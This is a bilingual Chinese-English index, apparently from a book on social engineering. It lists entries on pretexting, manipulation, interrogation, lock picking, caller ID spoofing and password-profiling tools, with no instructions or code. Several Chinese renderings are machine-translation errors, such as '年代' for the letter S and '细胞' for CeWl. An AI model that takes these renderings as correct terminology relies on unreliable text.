聆听

versus listening

 

保留和

retention and

 

欺骗中的犹豫

hesitation in deception

 

惠普,借口示例

Hewlett-Packard, pretexting example

 

霍根,凯文

Hogan, Kevin

 

人为缓冲区溢出

human buffer overflow

 

嵌入命令

embedded commands

 

模糊测试

fuzzing

 

人力基础设施

human infrastructure

 

屈辱

humiliation

 

I

 

ICanStalkU网站

ICanStalkU.com

 

识别攻击

identifying attacks

 

身份窃贼

identity thieves

 

撕毁汽车里的支票

ripped up check in car

 

意识形态激励

ideological incentives

 

听者的想象

imagination of listener

 

操纵的动机

incentives for manipulation

 

金融的

financial

 

思想

ideological

 

社会的

social

 

感激之情、回报和

indebted feelings, reciprocation and

 

漠不关心的审讯方式

indifferent approach to interrogation

 

间接审讯方式

indirect approach to interrogation

 

影响力。另请参阅说服

influence. See also persuasion

 

权威

authority

 

法律权威

legal authority

组织权威

organizational authority

社会权威

social authority

的象征

symbols of

西奥迪尼,罗伯特

Cialdini, Robert

 

承诺

commitment

 

让步

concession

 

附带特许权

contingent concessions

捐赠请求

donation requests

分期付款

installments

标签优惠

label concessions

谈判和

negotiation and

互惠

reciprocity

调节,营销

conditioning, marketing

 

共识

consensus

 

一致性

consistency

 

情绪和

emotions and

 

灵活性和

flexibility and

 

框架

framing

 

结盟

alignment

放大

amplification

桥接

bridging

扩大

extension

政治

politics

反对

protest

关系

relationships

关联

relevance

潜意识的

subliminal

任务

tasks

转型

transformation

用途

uses

基本面

fundamentals

 

目标

goals

 

霍根,凯文

Hogan, Kevin

 

内部对话和

internal dialog and

 

艾伦·兰格

Langer, Ellen

 

喜欢和

liking and

 

第一印象

first impressions

外表的吸引力

physical attractiveness

操纵

manipulation

 

焦虑

anxiety

颜色

color

调理

conditioning

对环境的控制

control over environment

定义

definitions

导流

diversion

怀疑

doubt

情绪反应

emotional responses

有罪

guilt

屈辱

humiliation

激励措施

incentives

恐吓

intimidation

丧失特权

loss of privilege

Motrin 召回

Motrin recall

规划图

planogram

积极的

positive

无能为力

powerlessness

物品陈设

product placement

购物者

shoppers

社交焦虑症运动

social anxiety disorder campaign

受暗示性

suggestibility and

用途

uses

NLP 和

NLP and

 

义务

obligation

 

关系

rapport

 

互惠

reciprocation

 

要求你想要的东西

ask for what you want

赠送某物

giving away something

恩情

indebted feelings

缺乏

scarcity

 

经济学

economics

故意短缺

intentional short supply

肉贩子

meat salesman

餐厅

restaurants

社会事件

social events

紧迫性

urgency

感觉敏锐度

sensory acuity

 

社会证明

social proof

 

偷拍相机

Candid Camera

笑声

laugh tracks

疼痛耐受力

pain tolerance

销售量

sales

相似

similarity

小费 罐 盐

tip jar salting

不确定

uncertainty

周围环境

surroundings

 

策略

tactics

 

信息收集

information gathering

 

回溯

BackTrack

 

篮子

BasKet

德拉迪斯

Dradis

咖啡店里的谈话

coffee shop conversation

 

承诺和一致性

commitment and consistency

 

通信建模和

communication modeling and

 

引出和

elicitation and

 

观察

observation

 

借口和

pretexting and

 

来源

sources

 

网站

websites

信息价值

information value

 

优惠分期付款

installments on concessions

 

说明、故事

instructions, stories as

 

保险公司同理心

insurance company empathy

 

故意造成产品短缺

intentional short supply of product

 

内部对话、影响和

internal dialog, influence and

 

网络欺诈、社会工程学和

Internet fraud, social engineering and

 

审讯

interrogation

 

积极进取

aggressive approach

 

替代路线

alternate route

 

基线

baseline

 

行为改变

behavior changes

 

身体姿势

body posture

 

组合方法

combination approach

 

否认

denials

 

国防部

Department of Defense

 

直接方法

direct approach

 

自负的方法

egotistical approach

 

情感方法

emotional approach

 

最终目标

end goal

 

环境控制

environment control

 

夸张手法

exaggeration approach

 

眼睛

eyes

 

面子的做法

face-saving approach

 

手势

gestures

 

锚定

anchoring

手臂/手的位置

arm/hand placement

文化差异

cultural differences

镜像

mirroring

手/脚

hands/feet

 

头部位置

head position

 

漠不关心的态度

indifferent approach

 

间接方法

indirect approach

 

与面试相比

versus interview

 

聆听

listening

 

分心

distractions

反馈

feedback

与听觉相比

versus hearing

打断

interrupting

注意

paying attention

证明

proof

反思性回应

reflective responding

回应

responses

逻辑方法

logical approach

 

嘴/嘴唇

mouth/lips

 

反对意见

objections

 

积极对抗

positive confrontation

 

准备问题

prep questions

 

初级意义

primary sense

 

专业战术

professional tactics

 

代词用法

pronoun use

 

响应时间

response time

 

標誌、組織

signs, groups

 

肤色

skin color

 

同情的态度

sympathetic approach

 

主题开发

theme development

 

动词时态

verb tense

 

嗓音

voice

 

楔入不在场证明方法

wedging the alibi approach

 

words

 

面谈审讯

interview versus interrogation

 

恐吓

intimidation

 

IP 地址、服务器、托管

IP addresses, servers, hosting

 

K

 

卡巴斯基实验室、社交网络

Kaspersky Labs, social networks

 

关键词匹配

key phrases, matching

 

善良、建立融洽关系和

kindness, rapport building and

 

动觉思考者

kinesthetic thinker

 

亚模态

sub-modalities

 

触摸物体

touching objects

 

Kmart 的商品规划图

Kmart’s planogram

 

知识

knowledge

 

假定

assumed

 

融洽关系和

rapport and

 

库尔干、穆尔吉斯

Kurgan, Murgis

 

大号

L

 

标签

labeling

 

乔治·莱科夫

Lakoff, George

 

艾伦·兰格

Langer, Ellen

 

心无旁骛

mindlessness

 

笑声、社会认同和

laugh tracks, social proof and

 

期望定律

law of expectations

 

律师

lawyers

 

领导人、社会权威和

leaders, social authority and

 

引导性问题

leading questions

 

线索,热门线索

leads, warm leads

 

法律权威

legal authority

 

法律问题,借口

legal issues, pretexting

 

李文

Li, Wen

 

喜欢

liking

 

第一印象

first impressions

 

影响和

influence and

 

营销和

marketing and

 

外表吸引力和

physical attractiveness and

 

让人们

steps to get people to

 

特百惠派对

Tupperware parties

 

LinkedIn

LinkedIn

 

嘴唇。另请参阅嘴/嘴唇

lips. See also mouth/lips

 

聆听

listening

 

分心

distractions

 

反馈

feedback

 

与听觉相比

versus hearing

 

打断

interrupting

 

注意

paying attention

 

证明

proof

 

建立融洽关系和

rapport building and

 

回应

responses

 

反思性回应

reflective responding

撬锁工具

lock picks

 

撞击键

bump keys

 

防撞 BiLock

Bump Proof BiLock

 

电子锁

electronic locks

 

套件

kits

 

磁力锁

magnetic locks

 

挂锁垫片

padlock shims

 

撬锁

picking locks

 

实践

practice

raking

推刀

shove knives

 

locks

 

伊丽莎白·洛夫特斯

Loftus, Elizabeth

 

审讯的逻辑方法

logical approach to interrogation

 

Long,Johnny,面向渗透测试人员的 Google 黑客技术

Long, Johnny, Google Hacking for Penetration Testers

 

洛斯阿拉莫斯科学家在中国

Los Alamos scientist in China

 

丧失特权

loss of privilege

 

维克多·卢斯蒂格

Lustig, Victor

 

M

 

伊万杰琳·马克林,《​​舞台方言》

Machlin, Evangeline, Dialects for the Stage

 

宏表达式

macroexpressions

 

磁力锁

magnetic locks

 

恶意黑客

malicious hackers

 

马尔特戈

Maltego

 

操纵

manipulation

 

焦虑

anxiety

 

颜色联想

color associations

 

黑色的

black

蓝色的

blue

棕色的

brown

金子

gold

绿色的

green

橙子

orange

紫色的

purple

红色的

red

白色的

white

黄色的

yellow

调理

conditioning

 

对环境的控制

control over environment

 

邪教

cults

 

定义

definitions

 

导流

diversion

 

怀疑

doubt

 

情绪反应

emotional responses

 

目标

goals

 

有罪

guilt

 

屈辱

humiliation

 

激励措施

incentives

 

金融的

financial

思想

ideological

社会的

social

恐吓

intimidation

 

丧失特权

loss of privilege

 

Motrin 召回

Motrin recall

 

规划图

planogram

 

积极的

positive

 

无能为力

powerlessness

 

物品陈设

product placement

 

购物者

shoppers

 

音乐循环

music loops

社交焦虑症运动

social anxiety disorder campaign

 

受暗示性

suggestibility and

 

增加

increasing

笔点击

pen clicks

破坏信仰

undermining beliefs

 

用途

uses

 

营销

marketing

 

美丽和

beauty and

 

调理

conditioning

 

一致性

consistency

 

意识形态激励

ideological incentives

 

喜欢和

liking and

 

社交焦虑症运动

social anxiety disorder campaign

 

约翰·马瑟利

Matherly, John

 

艾伯特·梅赫拉比安

Mehrabian, Albert

 

理查德·米琼

Michon, Richard

 

微动作

micro-movements

 

微表情

microexpressions

 

欺骗检测

deception detection

 

保罗·埃克曼

Ekman, Paul

 

情绪

emotions

训练

training

情绪

emotions

 

愤怒

anger

鄙视

contempt

厌恶

disgust

害怕

fear

幸福

happiness

 

局限性

limitations

 

镜像

mirroring

 

神经语言黑客

neurolinguistic hacking

 

悲伤

sadness

 

社会工程师和

social engineers and

 

坚忍的眼神

stoic eyes

 

惊喜

surprise

 

训练看看

training to see

 

微瞬间表达

micromomentary expressions

 

microsoft.com PDF 文件

microsoft.com PDF files

 

米兰,塞萨尔

Milan, Cesar

 

心无旁骛,艾伦·兰格

mindlessness, Ellen Langer

 

镜像手势

mirroring gestures

 

模仿微表情

mirroring microexpressions

 

米施克,汤姆

Mischke, Tom

 

错误,有目的的

mistakes, purposeful

 

减轻

mitigation

 

审计和

audits and

 

审计师选择

auditor selection

目标设定

goal setting

包含物品

included items

个人安全意识文化

personal security awareness culture

 

脚本

scripts

 

软件更新维护

software update maintenance

 

脚步

steps

 

凯文·米特尼克

Mitnick, Kevin

 

欺骗的艺术

The Art of Deception

 

DMV 黑客

DMV hack

 

社会保障管理局被黑客攻击

Social Security Administration hack

 

米兹拉希,阿维

Mizrahi, Avi

 

思维方式

modes of thinking

 

听觉思考者

auditory thinkers

 

主导意识、辨别力

dominant sense, discernment

 

联邦调查局备忘录

FBI memo

 

的重要性

importance of

 

审讯和

interrogation and

 

动觉思考者

kinesthetic thinkers

 

亚模态

sub-modalities

倾听

listening for

 

观察

observation

 

笔练习

pen exercise

 

感官

senses

 

亚模态

sub-modalities

视觉思考者

visual thinkers

 

亚模态

sub-modalities

“语音和视觉的修改”

“Modification of Audible and Visual Speech”

 

摩根·斯科特

Morgan, Scott

 

摩根士丹利员工盗窃

Morgan Stanley employee theft

 

莫里亚蒂和托马斯在海滩偷收音机

Moriarty, Thomas, radio stealing at beach

 

Motrin 召回

Motrin recall

 

莫尔顿、斯科特、港口扫描

Moulton, Scott, port scans

 

嘴/嘴唇,询问和

mouth/lips, interrogation and

 

电影、预加载和

movies, preloading and

 

Mularski,J.Keith,DarkMarket

Mularski, J. Keith, DarkMarket

 

音乐循环用于引导顾客

music loops for shopper manipulation

 

N

 

天生的领导者

natural-born leaders

 

需求,心理

needs, psychological

 

否定、嵌入命令和

negation, embedded commands and

 

谈判、让步

negotiation, concessions

 

神经语言黑客

neurolinguistic hacking

 

尼克森,克里斯

Nickerson, Chris

 

借口

pretexting

 

尼日利亚骗局

Nigerian Scam

 

NLP(神经语言程序设计)

NLP (neurolinguistic programming)

 

理查德·班德勒

Bandler, Richard

 

格雷戈里·贝特森

Bateson, Gregory

 

理查德·布兰德勒

Brandler, Richard

 

呼吸率

breathing rate

 

代码

codes

 

康登,威廉

Condon, William

 

有意识/无意识的关系

conscious/unconscious relationships

 

定义

definition

 

朱迪思·德洛齐尔

DeLozier, Judith

 

格林德,约翰

Grinder, John

 

历史

history

 

影响和

influence and

 

关键短语

key phrases

 

元模型

meta-model

 

新代码

new code

 

知觉过滤器

perceptual filters

 

NLP星球

Planet NLP

 

脚本

scripts

 

句子的结构

sentence structure

 

社会工程师的用途

social engineers’ uses

 

语音模式匹配

speech pattern matching

 

状态

states

 

终极声音

Ultimate Voice

 

语音音调匹配

vocal tone matching

 

嗓音

voice

 

NMAP,端口扫描

NMAP, port scans

 

非口头交流

nonverbal communication

 

NSA(国家安全局),诱导

NSA (National Security Agency), elicitation

 

O

 

反对意见

objections

 

义务

obligation

 

观察

observation

 

办公室声音

office sounds

 

在线工具

online tools

 

马尔特戈

Maltego

 

SET(社会工程师工具包)

SET (Social Engineer Toolkit)

 

开放式问题

open-ended questions

 

张开手掌

open palm

 

开场白

opening lines

 

开放

opening up

 

橙色联想

orange color association

 

微笑时的眼轮匝肌

orbicularis oculi muscle in smiling

 

组织权威

organizational authority

 

莫琳·奥沙利文

O’Sullivan, Maureen

 

保罗·埃克曼

Ekman, Paul

 

巫师计划

Wizards Project

 

过度自信的首席执行官

Overconfident CEO hack

 

P

 

挂锁垫片

padlock shims

 

疼痛耐受力、社会建模和

pain tolerance, social modeling and

 

帕勒,肯 A.

Paller, Ken A.

 

密码分析器

password profilers

 

细胞

CeWl

 

CUPP(通用用户密码分析器)

CUPP (Common User Password Profiler)

 

WYD(谁是你爸爸)

WYD (Who’s Your Daddy)

 

密码

passwords

 

攻击列表

attack list

 

BitDefender 研究

BitDefender study

 

常用主题

commonly used themes

 

过去式否定形式

past tense for negatives

 

伊凡·巴甫洛夫

Pavlov, Ivan

 

注意

paying attention

 

笔点击操作

pen click manipulation

 

渗透测试人员

penetration testers

 

程序崩溃

program crashes

 

洞察力

perception

 

沟通和

communication and

 

框架和

framing and

 

危难之人

person in distress

 

目标个人依恋

personal attachments of target

 

个人信息,网站提供

personal information, websites offering

 

个人利益,借口和

personal interests, pretexting and

 

个人现实和沟通

personal realities and communication

 

个人安全意识文化

personal security awareness culture

 

个人网站

personal websites

 

说服。另请参阅影响力

persuasion. See also influence

 

调节,营销

conditioning, marketing

 

共识

consensus

 

情绪和

emotions and

 

灵活性和

flexibility and

 

目标

goals

 

喜欢和

liking and

 

第一印象

first impressions

外表的吸引力

physical attractiveness

操纵

manipulation

 

颜色

color

调理

conditioning

对环境的控制

control over environment

定义

definitions

导流

diversion

怀疑

doubt

情绪反应

emotional responses

激励措施

incentives

恐吓

intimidation

Motrin 召回

Motrin recall

规划图

planogram

无能为力

powerlessness

物品陈设

product placement

购物者

shoppers

社交焦虑症运动

social anxiety disorder campaign

受暗示性

suggestibility and

用途

uses

感觉敏锐度

sensory acuity

 

社会证明

social proof

 

偷拍相机

Candid Camera

笑声

laugh tracks

疼痛耐受力

pain tolerance

销售量

sales

相似

similarity

小费 罐 盐

tip jar salting

不确定

uncertainty

周围环境

surroundings

 

制药公司和互惠

pharmaceutical companies and reciprocation

 

网络钓鱼

phishing

 

电子邮件

email

 

SET(社会工程师工具包)

SET (Social Engineer Toolkit)

 

电话使用

phone use

 

照片、智能手机、GPS 定位

photographs, smart phones, GPS location

 

外表的吸引力

physical attractiveness

 

物理工具

physical tools

 

相机

cameras

 

撬锁工具

lock picks

 

撞击键

bump keys

防撞 BiLock

Bump Proof BiLock

电子锁

electronic locks

套件

kits

磁力锁

magnetic locks

挂锁垫片

padlock shims

推刀

shove knives

录音设备

recording devices

 

的原因

reasons for

撬锁

picking locks

 

撞击键

bump keys

 

电子锁

electronic locks

 

磁力锁

magnetic locks

 

挂锁垫片

padlock shims

 

实践

practice

 

raking

 

推刀

shove knives

 

NLP星球

Planet NLP

 

规划图

planogram

 

种植理念。请参阅预加载

planting ideas. See preloading

 

政客和回报

politicians and recriprocation

 

政治、框架和

politics, framing and

 

端口扫描

port scans

 

欧洲法律

European laws

 

米兹拉希,阿维

Mizrahi, Avi

 

莫尔顿·斯科特

Moulton, Scott

 

积极对抗

positive confrontation

 

积极操纵

positive manipulation

 

正强化

positive reinforcement

 

目标无力

powerlessness of target

 

实践

practice

 

方言

dialects

 

表达式

expressions

 

预加载

preloading

 

电影和

movies and

 

牛排晚餐

steak dinner

 

前提

presupposition

 

借口

pretexting

 

名人死亡

celebrity death

 

结论

conclusion

 

定义

definition

 

描述

description

 

方言

dialects

 

例子

examples

 

惠普

Hewlett-Packard

里夫金,斯坦利·马克

Rifkin, Stanley Mark

表达式

expressions

 

跟进

follow-through

 

联邦贸易委员会和

FTC and

 

信息收集和

information gathering and

 

互联网和

Internet and

 

法律问题

legal issues

 

生活用途

life uses

 

个人兴趣

personal interests

 

电话使用

phone use

 

皮特、布拉德

Pitt, Brad

 

灾后诈骗

post-disaster scams

 

原则

principles of

 

电台主持人和

radio hosts and

 

研究和

research and

 

简单

simplicity

 

自发性

spontenaity

 

目标、附件

targets, attachments

 

技术支持人员

tech support guy

 

工具

tools

 

预防

prevention

 

审计和

audits and

 

审计师选择

auditor selection

目标设定

goal setting

包含物品

included items

个人安全意识文化

personal security awareness culture

 

脚本

scripts

 

软件更新维护

software update maintenance

 

脚步

steps

 

物品陈设

product placement

 

分析软件

profiling software

 

密码分析器

password profilers

 

CUPP(通用用户密码分析器)

CUPP (Common User Passwords Profiler)

WYD(谁是你爸爸)

WYD (Who’s Your Daddy)

进步环保运动

Progressive Environmentalist Movement

 

代词用法

pronoun use

 

聆听证明

proof of listening

 

道具、借口

props, pretexting

 

心理需求

psychological needs

 

心理学家

psychologists

 

公开报告

public reports

 

公共服务器

public servers

 

马泰尔戈

Matelgo

 

紫色色彩联想

purple color association

 

Q

 

问题

questions

 

假定

assumptive

 

封闭式

closed-ended

 

领导

leading

 

开放式

open-ended

 

金字塔方法

pyramid approach

 

引号、嵌入命令和

quotes, embedded commands and

 

R

R

 

撬锁用的耙子

rakes for lock picking

 

耙锁

raking locks

 

关系

rapport

 

积极倾听、反思回应

active listening, reflective responding

 

银行出纳员

bank tellers

 

建筑

building

 

对人的影响

affect on people

外观和

appearance and

肢体语言匹配

body language matching

呼吸率

breathing rate

关键短语

key phrases

善良和

kindness and

喜欢人

liking people

聆听

listening

语音模式匹配

speech pattern matching

语音音调匹配

vocal tone matching

好奇心和

curiosity and

 

定义

definition

 

同情和

empathy and

 

基本知识

general knowledge

 

重要性

importance

 

影响和

influence and

 

满足人们的需求

meeting people’s needs

 

谈论自我

talking about self

 

测试

testing

 

拉苏尔·伊姆兰

Rasul, Imran

 

真人秀节目,框架和

reality TV shows, framing and

 

互惠

reciprocation

 

要求你想要的东西

ask for what you want

 

优惠和

concessions and

 

文化差异和

cultural differences and

 

赠送某物

giving away something

 

阿尔文·古尔德纳

Gouldner, Alvin

 

恩情

indebted feelings

 

影响和

influence and

 

录音设备

recording devices

 

蜂窝卡

cellular card

 

的原因

reasons for

 

红色联想

red color association

 

反思性回应

reflective responding

 

加强

reinforcement

 

关系、框架和

relationships, framing and

 

汽车租赁

rental car

 

报告、公开报告

reports, public reports

 

研究、借口和

research, pretexting and

 

响应时间、询问和

response time, interrogation and

 

里夫金,斯坦利·马克

Rifkin, Stanley Mark

 

撕毁汽车里的支票

ripped up check in car

 

ROI(投资回报率)、黑客和

ROI (return on investment), hackers and

 

路由器,正在搜索

routers, searching for

 

沟通规则

rules for communication

 

拉什,乔纳森 J.

Rusch, Jonathan J.

 

年代

S

 

悲伤

sadness

 

销售、社会认同和

sales, social proof and

 

销售人员

salespeople

 

社会工程师镜像

social engineers mirroring

 

往小费罐里加盐

salting the tip jar

 

萨金特,威廉,《心灵之战》

Sargant, William, Battle for the Mind

 

强化满足

satiation of reinforcement

 

诈骗者

scam artists

 

稀缺原则

scarcity principle

 

经济学

economics

 

故意短缺

intentional short supply

 

肉贩子

meat salesman

 

餐厅

restaurants

 

社会事件

social events

 

紧迫性

urgency

 

脚本

scripts

 

预防和缓解

prevention and mitigation

 

SE(社会工程学)

SE (Social Engineering)

 

定义

definition

 

概述

overview

 

稀缺性和

scarcity and

 

用途

uses

 

搜索引擎

search engines

 

谷歌

Google

 

初段

Shodan

 

安全

security

 

黑客同事

hackers versus co-workers

 

软件补丁

patches for software

 

个人安全意识文化

personal security awareness culture

 

严肃

seriousness

 

通过教育实现安全

security through education

 

自信,情境

self-confidence, situational

 

感官

senses

 

思维方式

modes of thinking

 

亚模态

sub-modalities

 

感觉敏锐度

sensory acuity

 

句子结构、NLP 和

sentence structure, NLP and

 

服务器

servers

 

托管

hosting

 

民众

public

 

寻找

searching for

 

SET(社会工程师工具包)

SET (Social Engineer Toolkit)

 

克劳德·香农

Shannon, Claude

 

香农-韦弗模型

Shannon-Weaver model

 

基础

basis

 

问题

problems for

 

Shodan 搜索引擎

Shodan search engine

 

购物者,操纵

shoppers, manipulation

 

音乐循环

music loops

 

产品短缺

short supply of product

 

撬锁用推刀

shove knives for lock picking

 

碎纸

shredded documents

 

相似性、社会认同和

similarity, social proof and

 

借口简单

simplicity in pretexting

 

技能,根深蒂固

skills, ingraining

 

肤色、审讯和

skin color, interrogation and

 

斯基特卡,琳达

Skitka, Linda

 

马尔科姆·斯莱尼

Slaney, Malcolm

 

聪明的杰米

Smart, Jamie

 

“地图不是领土。”

“The map is not the territory.”

 

智能手机、图片、GPS 定位

smart phones, pictures, GPS location

 

SMCR(发送者-消息-通道-接收者)模型

SMCR (Sender-Message-Channel-Receiver) model

 

微笑

smiles

 

杜兴·德·布洛涅

de Boulogne, Duchenne

 

true versus fake

 

斯诺,大卫

Snow, David

 

框架放大

frame amplification

 

社会,定义

social, definition

 

社交焦虑症运动

social anxiety disorder campaign

 

社会权威

social authority

 

社会工程框架

social engineering framework

 

社会工程师

social engineers

 

沟通和

communication and

 

心怀不满的员工

disgruntled employees

 

医生

doctors

 

高管招聘人员

executive recruiters

 

政府

governments

 

黑客

hackers

 

身份窃贼

identity thieves

 

律师

lawyers

 

微表情和

microexpressions and

 

NLP 使用

NLP use

 

渗透测试人员

penetration testers

 

心理学家

psychologists

 

销售人员

salespeople

 

诈骗者

scam artists

 

间谍

spies

 

思考

thinking like

 

类型

types

 

社会激励

social incentives

 

社交网络

social networks

 

尾随

tail-gaiting

 

社会交往规则

social interaction rules

 

社交媒体

social media

 

哔哔

Blippy

 

信息收集

information gathering

 

社交媒体渠道、工作信息

social media outlets, job information

 

社会证明

social proof

 

偷拍相机

Candid Camera

 

明星代言产品

celebrity endorsement of product

 

西奥迪尼,罗伯特

Cialdini, Robert

 

笑声

laugh tracks

 

疼痛耐受力

pain tolerance

 

销售和

sales and

 

相似性和

similarity and

 

小费 罐 盐

tip jar salting

 

不确定性和

uncertainty and

 

社会保障管理局黑客攻击(米特尼克)

Social Security Administration hack (Mitnick)

 

社会安全号码

Social Security Number

 

背景检查员和

background checkers and

 

非法使用

illegal use

 

软件

software

 

分析软件

profiling software

 

马尔特戈

Maltego

密码分析器

password profilers

互联网搜索

searching Internet for

 

安全补丁

security patches

 

更新维护

update maintenance

 

语音模式匹配

speech pattern matching

 

间谍

spies

 

恶搞应用

SpoofApp

 

恶搞卡

SpoofCard

 

欺骗

spoofing

 

来电显示

Caller ID

 

来电显示

caller ID

 

SpyHawk SuperTrak GPS 全球超级轨迹棒 USB 数据记录器

SpyHawk SuperTrak GPS Worldwide Super Trackstick USB Data Logger

 

读取数据

reading data

 

集邮

stamp collection

 

尖塔状手指

steepled fingers

 

史蒂文斯,汤姆·G.,自信

Stevens, Tom G., self-confidence

 

坚忍的眼神

stoic eyes

 

故事作为直接指导

stories as direct instructions

 

潜意识框架

subliminal framing

 

目标的暗示性

suggestibility of target

 

增加

increasing

 

笔点击

pen clicks

 

惊喜

surprise

 

恐惧和

fear and

 

权威的象征

symbols of authority

 

以同情的态度进行审讯

sympathetic approach to interrogation

 

电视

T

 

尾随

tail-gating

 

敲击/敲击手指

tapping/drumming fingers

 

目标

targets

 

注意,保持

attention, holding

 

基线

baseline

 

行为和你的情绪

behavior and your emotion

 

情感依恋

emotional attachments

 

环境,控制

environment, controlling

 

恐吓

intimidation

 

个人依恋

personal attachments

 

无能为力

powerlessness

 

受暗示性增加

suggestibility, increasing

 

破坏信仰

undermining beliefs

 

技术支持,借口

tech support, pretexting

 

Teensy HID 攻击向量

Teensy HID attack vector

 

电话使用

telelphone use

 

基于电话的工具

telephone-based tools

 

星号

Asterisk

 

来电显示欺骗

Caller ID spoofing

 

脚本

scripts

 

恶搞应用

SpoofApp

 

恶搞卡

SpoofCard

 

2006 年电话记录和隐私保护法案

Telephone Records and Privacy Protection Act of 2006

 

时态转换

tense switches

 

撬锁用扭力扳手

tension wrenches for lock picking

 

欺骗的艺术(米特尼克)

The Art of Deception (Mitnick)

 

人类与动物的情感表达(达尔文)

The Expression of the Emotions in Man and Animals (Darwin)

 

真正的喧嚣

The Real Hustle

 

盗窃、员工盗窃

theft, employee theft

 

主题开发

theme development

 

主题公园丑闻

Theme Park Scandal

 

欣欣向荣的办公室

Thriving Office

 

小费 罐 盐

tip jar salting

 

汤姆金斯,西尔万

Tomkins, Silvan

 

工具

tools

 

GPS追踪器

GPS Tracker

 

在线的

online

 

马尔特戈

Maltego

SET(社会工程师工具包)

SET (Social Engineer Toolkit)

密码分析器

password profilers

 

身体的

physical

 

相机

cameras

撬锁工具

lock picks

录音设备

recording devices

实践

practice

 

借口

pretexting

 

电话

telephone-based

 

星号

Asterisk

来电显示欺骗

Caller ID spoofing

脚本

scripts

恶搞应用

SpoofApp

恶搞卡

SpoofCard

绝密 1 案例研究

Top Secret 1 case study

 

绝密 2 案例研究

Top Secret 2 case study

 

酷刑、陷害和

torture, framing and

 

Tostitos 徽标

Tostitos logo

 

通过动觉思考者触摸物体

touching objects by kinesthetic thinkers

 

触摸自己

touching self

 

通信交易模型,巴尔蒙德,华盛顿特区

transactional model of communications, Balmund, D.C.

 

垃圾

trash

 

翻找垃圾箱的指南

dumpster diving pointers

 

碎纸

shredded documents

 

有价值的东西

valuable things

 

特百惠派对

Tupperware parties

 

一路向下的乌龟(DeLozier 和 Grinder)

Turtles All the Way Down (DeLozier and Grinder)

 

电视真人秀、框架和

TV reality shows, framing and

 

U

 

终极语音、NLP 和

Ultimate Voice, NLP and

 

不确定性、社会认同和

uncertainty, social proof and

 

破坏信仰

undermining beliefs

 

揭开面纱(埃克曼)

Unmasking the Face (Ekman)

 

更新软件

updating software

 

USB 驱动器接受、通信和

USB drive acceptance, communication and

 

用户站点

user sites

 

V

 

有价值的东西被扔掉

valuable things thrown away

 

信息的价值

value of information

 

动词时态

verb tense

 

口头交流

verbal communication

 

视觉框架

visual framing

 

视觉思考者

visual thinkers

 

亚模态

sub-modalities

 

语音音调匹配

vocal tone matching

 

嗓音

voice

 

审讯和

interrogation and

 

NLP 和

NLP and

 

Vontu,电子邮件中的机密数据

Vontu, confidential data in email

 

西

W

 

温暖线索

warm leads

 

Weaver, Warren。另请参阅Shannon-Weaver 模型

Weaver, Warren. See also Shannon-Weaver model

 

网络攻击媒介,SET(社会工程师工具包)

web attack vector, SET (Social Engineer Toolkit)

 

网站

websites

 

背景检查员

background checkers

 

ICanStalkU网站

ICanStalkU.com

 

信息收集

information collection

 

撬锁

lock picking

 

microsoft.com,PDF 文件

microsoft.com, PDF files

 

个人网站

personal websites

 

公开报告

public reports

 

公共服务器

public servers

 

搜索引擎

search engines

 

社会工程师

social-engineer.org

 

社交媒体

social media

 

用户站点

user sites

 

将不在场证明方法引入审讯

wedging the alibi approach to interrogation

 

克里斯·韦斯特伯里

Westbury, Chris

 

白色联想

white color association

 

谁是

Whois

 

温斯顿·乔尔

Winston, Joel

 

玛格丽特·威戈特

Withgott, Margaret

 

巫师计划

Wizards Project

 

黄凯薇

Wong, Kelvie

 

言语、质问和

words, interrogation and

 

职场朋友

workplace friends

 

WYD(谁是你爸爸)分析软件

WYD (Who’s Your Daddy) profiling software

 

Y

 

黄色联想

yellow color association

 

Z

 

辛巴格(Zinbarg),理查德 E.

Zinbarg, Richard E.

 

微笑时颧大肌

zygomaticus major muscle in smiling